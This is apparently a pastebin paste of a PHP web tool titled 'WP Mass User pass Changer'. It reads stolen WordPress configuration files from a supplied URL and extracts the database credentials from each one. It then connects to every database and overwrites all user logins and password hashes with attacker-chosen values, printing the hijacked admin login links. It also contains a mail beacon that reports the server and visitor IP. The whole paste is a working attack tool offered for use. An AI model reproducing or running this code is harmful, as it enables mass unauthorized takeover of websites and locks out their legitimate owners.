Guest User


a guest
Aug 17th, 2019
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  1. <html>
  2. <head>
  3. <title>WP Mass Changer by Fighter Anas</title>
  5. </head>
  7. <style type="text/css">
  8. @import '';
  9. html,body{
  10. background: black;
  11. padding: 0;
  12. direction: ltr;
  13. margin: 0;
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  15. h1{
  16. color:#16a085;
  17. text-shadow:0 0 5px;
  18. font-family: Iceland;
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  20. #gter{
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  23. width: 100%;
  24. text-align: center;
  25. background: black;
  26. color:#fff;
  27. padding-top: 10px;
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  29. font-family: Iceland;
  30. margin-bottom:20px;
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  32. #gter span{
  33. color:white;
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  47. text-shadow:0 0 15px #00ff00;
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  49. form{
  50. margin-top: 120px;
  51. }
  52. input[type=submit]{
  53. font-size:20px;
  54. height: 30px;
  55. width: 165px;
  56. border: 2px solid red;
  57. color: yellow;
  58. background-color: black;
  59. font-family: Iceland;
  60. }
  61. input[type=submit]:hover{
  62. box-shadow: 0 0 2px #ff0000;
  63. }
  64. input[type=text]{
  65. font-family:Iceland;
  66. width: 450px;
  67. height: 30px;
  68. color: red;
  69. background: #000000;
  70. border: 1px solid #00ff00;
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  85. }
  86. </style>
  91. </head>
  92. <body>
  93. <center>
  94. <center><p class="heading">WP Mass User pass Changer by Fighter Anas</p></center>
  95. <br /><br />
  96. <form method="post">
  97. <input type="text" name="config" placeholder="Past Config URL Here">
  98. <br><br>
  99. <input type="submit" name="ch" value="Click Here">
  100. </form>
  101. </center>
  102. <?php
  103. set_time_limit(0);
  104. error_reporting(0);
  105. if($_POST['ch']){ $get2 = file_get_contents($_POST['config']);
  106. preg_match_all('#<a href="(.*?)"#', $get2, $config);
  107. foreach($config[1] as $don){ $get = file_get_contents($_POST['config']."/".$don);
  108. preg_match_all("#'DB_HOST', '(.*?)'#", $get, $host);
  109. foreach($host[1] as $don){ $host = $don; }
  110. preg_match_all("#'DB_PASSWORD', '(.*?)'#", $get, $pass); foreach($pass[1] as $done){ $password = $done; } preg_match_all("#'DB_USER', '(.*?)'#", $get, $user);
  111. foreach($user[1] as $done1){ $user = $done1;
  112. } preg_match_all("#'DB_NAME', '(.*?)'#", $get, $name); foreach($name[1] as $done2){ $name = $done2;
  113. } preg_match_all("#$table_prefix = '(.*?)'#", $get, $prefix); foreach($prefix[1] as $done3){ $prefix = $done3;
  114. } $connect = mysqli_connect($host,$user,$password,$name);
  115. if($connect){ $query1 = mysqli_query($connect,"select * from ".$prefix."options where option_name='siteurl'");
  116. while($siteurl = mysqli_fetch_array($query1)){ $site_url = $siteurl['option_value'];
  117. } $query2 = mysqli_query($connect,"update ".$prefix."users set user_login='fighter',user_pass='76eb649c047cbecad7c36e71374bc9a5'");
  118. if($query2){
  119. echo "<center><span class=f>URL : <a href='$site_url/wp-login.php' target='_blank'>$site_url/wp-login.php</a><br><br>UserName : fighter<br><br>Password : anas<br><br></span></center>"; } } } }
  120. $time_shell = "".date("d/m/Y - H:i:s")."";
  121. $ip_remote = $_SERVER["REMOTE_ADDR"];
  122. $from_shellcode ='Fighter @'.gethostbyname($_SERVER['SERVER_NAME']).'';
  123. $to_email = '';$server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])." - ".$_SERVER['HTTP_HOST']."";
  124. $linkcr = "Fxbuff Shell : ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Yang Gunain : $ip_remote - Time: $time_shell";
  125. $header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
  126. @mail($to_email, $server_mail, $linkcr, $header);
  127. ?>
  128. </body>
  129. </html>
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